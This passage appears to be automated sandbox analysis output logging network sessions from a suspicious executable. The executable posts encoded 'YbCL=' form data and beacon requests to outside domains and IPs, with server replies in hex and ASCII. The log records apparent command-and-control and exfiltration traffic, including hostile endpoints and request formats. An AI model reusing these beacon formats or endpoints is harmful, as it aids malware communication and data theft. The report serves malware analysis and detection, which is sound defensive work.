                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 65 7a 6c 33 6c 59 68 34 4e 6a 35 65 39 42 44 50 79 51 70 61 4f 62 42 63 4f 4f 5a 51 46 47 7a 35 6a 4f 54 6f 6c 33 73 56 68 43 46 43 79 71 4d 4f 34 3d
                                          Data Ascii: YbCL=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Zezl3lYh4Nj5e9BDPyQpaObBcOOZQFGz5jOTol3sVhCFCyqMO4=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.749714208.91.197.27806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:27.088635921 CEST1835OUTPOST /xzzi/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.bfiworkerscomp.com
                                          Origin: http://www.bfiworkerscomp.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.bfiworkerscomp.com/xzzi/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 4f 71 54 63 7a 61 48 2b 53 50 75 49 71 59 6c 6d 78 4e 76 4a 34 66 37 38 78 70 4e 59 6d 32 69 74 54 75 41 2f 71 68 66 55 49 77 71 4b 2f 35 51 59 5a 41 73 69 31 4c 61 68 2b 63 58 59 61 54 76 65 55 6f 4b 46 43 38 41 51 52 66 48 4a 51 69 53 57 38 4b 4c 43 71 61 4b 62 4d 4b 36 4e 51 39 79 2b 61 64 69 4b 44 57 78 63 6c 4a 43 54 57 46 30 4d 71 46 79 48 52 33 54 6b 62 73 41 53 69 35 45 57 30 49 6e 68 37 34 73 43 6b 49 74 61 45 70 47 55 6f 34 76 6b 47 58 4c 52 30 49 50 47 54 54 74 31 56 4a 7a [TRUNCATED]
                                          Data Ascii: YbCL=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5Jocmq6xc6LJXtzpf1TPVjyJ7QLVT6xgiLHgrNuzEz5fppDcQZszkOQcbx04v1UdZ00hJ9YnHhMa0SAXJ7ZPkLHd0JrahC9d1a4LZyFidbSoktgs/Sbqtx+G6v+PBeAaHOqTczaH+SPuIqYlmxNvJ4f78xpNYm2itTuA/qhfUIwqK/5QYZAsi1Lah+cXYaTveUoKFC8AQRfHJQiSW8KLCqaKbMK6NQ9y+adiKDWxclJCTWF0MqFyHR3TkbsASi5EW0Inh74sCkItaEpGUo4vkGXLR0IPGTTt1VJzrW2fLpTqbl6QU2cdsAN1NpjsWl++svj7ffKXbX8K3XTiPGoLLKLskMO9UO/wVhYzPqvZkyYXdGcVKUJ7okgorxWXIwu3asZ6AKMbhW0S4fpddOgEjob1k+rFLCmm4kvmvaCZb72/zL6r25+dlV2pUU/jNeSPlXCKDrtW0kT1GCS0pVff+0fH0njOIMAocbUm0RlCMsKeq3GHB3OHS3Gi9pB8dLfLpbpzcj5R1mRRe3UTB6Pjg9ArKJieKxBEqTDE0E/XhXxZtXIi6do0Tf1IXLn0gxOCanJokT4C0BzZvdyP7rYatIILEkzjUoPOivEVh8+M4uhVb1yA9GDColDXxXqIU5PNgurQTz+NUSu1UkrIiI61P6PYqEfW9P8coU3d682/GLcDegWtuZwX4OQN94lCBx2c/cYcL7XZ0lyOayzmiuRJwB9V23v0W8W5j/bxY5VAcOrEJ4I8O/FwZPUW6I2DPFBeN6c8COL+Bw/dtyp1hk6QsNppudBWbWAf/DRl9K+ulxaxnNXt+l4Oi40V3wDipi+YEyW1IKFrQD3wl9xc9tL+kyj7kEls2d0/5dI34RzoQXlYSxnLbHY04PoWqHbVyhqxY31ai/N+OrYXhhEP74iAjMf9XqCLZZ1xGimHnhcD7qeWUC4KVivaF6KATuglYeiEp8nHgE [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.749715208.91.197.27806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:29.616545916 CEST532OUTGET /xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfR HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.bfiworkerscomp.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:53:30.541063070 CEST1236INHTTP/1.1 200 OK
                                          Date: Thu, 04 Jul 2024 14:53:20 GMT
                                          Server: Apache
                                          Set-Cookie: vsid=927vr467650400251865281; expires=Tue, 03-Jul-2029 14:53:20 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Z5RlH6byuPGt3GizcKQdqpzG98LJc4q5dv5mH3BEJys8KMJxm4ZQCUsA9bPyV0P/Nlj0q4oRj5Vz7Zu9oqLzBw==
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Data Raw: 61 32 32 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                          Data Ascii: a22b<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="c
                                          Jul 4, 2024 16:53:30.541084051 CEST1236INData Raw: 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 72 6f 74 6f 3d 22 68 74 74 70 73 3a 22 7d 69 66 28 21
                                          Data Ascii: dn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL"
                                          Jul 4, 2024 16:53:30.541098118 CEST1236INData Raw: 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 22 63 6d 70 5f 73 65 74 6c 61 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 6c 61 6e 67 21 3d 22 22 29 7b 63 2e 70 75 73 68 28 77 69 6e 64 6f 77 2e 63 6d 70 5f
                                          Data Ascii: ase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navigator){c.push(navigator.language)}if("userLanguage"
                                          Jul 4, 2024 16:53:30.541125059 CEST1236INData Raw: 68 2e 63 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21 3d 22 68 74 74 70 3a 22 26 26 6b 21 3d 22 68 74 74 70 73 3a 22 29 7b 6b 3d 22 68 74 74 70 73 3a 22 7d 76 61 72 20 67 3d 28 22 63 6d 70 5f 72 65 66 22 20 69 6e 20 68 29
                                          Data Ascii: h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpreg
                                          Jul 4, 2024 16:53:30.541136026 CEST859INData Raw: 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 76 61 72 20 6d 3d 22 6a 73 22 3b 76 61 72 20 70 3d 78 28 22 63 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 22 2c 22 63 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 22 20
                                          Data Ascii: ].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.cr
                                          Jul 4, 2024 16:53:30.541141033 CEST1236INData Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72
                                          Data Ascii: splay:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none"
                                          Jul 4, 2024 16:53:30.541145086 CEST1236INData Raw: 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f
                                          Data Ascii: .push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","us
                                          Jul 4, 2024 16:53:30.541151047 CEST1236INData Raw: 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3b 74
                                          Data Ascii: apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.paramete
                                          Jul 4, 2024 16:53:30.541419983 CEST672INData Raw: 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77
                                          Data Ascii: eof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=functi
                                          Jul 4, 2024 16:53:30.541433096 CEST1236INData Raw: 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 74 63 66 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66
                                          Data Ascii: tcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window
                                          Jul 4, 2024 16:53:30.546256065 CEST1236INData Raw: 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 36 32 30 27 20 62 3d 27 33 33 35 36 35 27 20 63 3d 27 62 66 69 77 6f 72 6b 65 72 73 63 6f 6d
                                          Data Ascii: ch(err){}}</script><meta name="tids" content="a='29620' b='33565' c='bfiworkerscomp.com' d='entity_mapped'" /><title>Bfiworkerscomp.com</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.74971643.252.167.188806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:44.361553907 CEST808OUTPOST /rm91/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--fhq1c541j0zr.com
                                          Origin: http://www.xn--fhq1c541j0zr.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 52 5a 33 44 4d 57 6b 51 54 6b 4e 62 43 4d 6b 50 6d 77 2b 53 78 79 6f 31 32 55 6d 47 38 45 6f 52 42 41 71 44 43 4e 71 72 47 6c 50 79 61 44 37 30 51 3d 3d
                                          Data Ascii: YbCL=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPRZ3DMWkQTkNbCMkPmw+Sxyo12UmG8EoRBAqDCNqrGlPyaD70Q==
                                          Jul 4, 2024 16:53:45.284420013 CEST367INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:27 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.74971743.252.167.188806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:46.900096893 CEST828OUTPOST /rm91/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--fhq1c541j0zr.com
                                          Origin: http://www.xn--fhq1c541j0zr.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4b 54 78 30 77 51 52 61 5a 64 54 41 45 79 4f 67 35 4c 30 78 41 6c 2f 49 69 2f 69 76 58 2f 63 2f 2f 31 37 36 67 75 59 47 36 61 62 67 66 68 30 6a 38 3d
                                          Data Ascii: YbCL=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgKTx0wQRaZdTAEyOg5L0xAl/Ii/ivX/c//176guYG6abgfh0j8=
                                          Jul 4, 2024 16:53:47.793884993 CEST367INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:29 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.74971843.252.167.188806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:53:49.450368881 CEST1841OUTPOST /rm91/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--fhq1c541j0zr.com
                                          Origin: http://www.xn--fhq1c541j0zr.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 34 57 66 77 41 41 41 6b 30 61 53 6d 65 51 2f 45 6f 44 57 73 4a 43 62 43 38 33 44 67 52 38 38 48 6b 58 78 4c 69 46 32 4c 36 37 48 4e 66 66 31 59 41 56 65 54 7a 71 45 43 6a 62 70 6c 4a 68 43 5a 6e 49 2b 2b 72 59 6d 38 77 35 52 48 31 63 4f 30 38 63 77 34 6b 7a 62 4d 37 51 72 2f 73 4a 36 6b 72 4e 30 48 4a 50 68 57 70 5a 43 2b 70 37 34 53 74 4f 62 59 50 44 35 48 59 75 32 39 41 53 47 66 74 70 39 44 4a 4e 64 72 45 43 35 53 55 38 63 61 31 58 7a 43 56 4d 36 34 4b 50 49 35 58 58 49 54 62 74 30 [TRUNCATED]
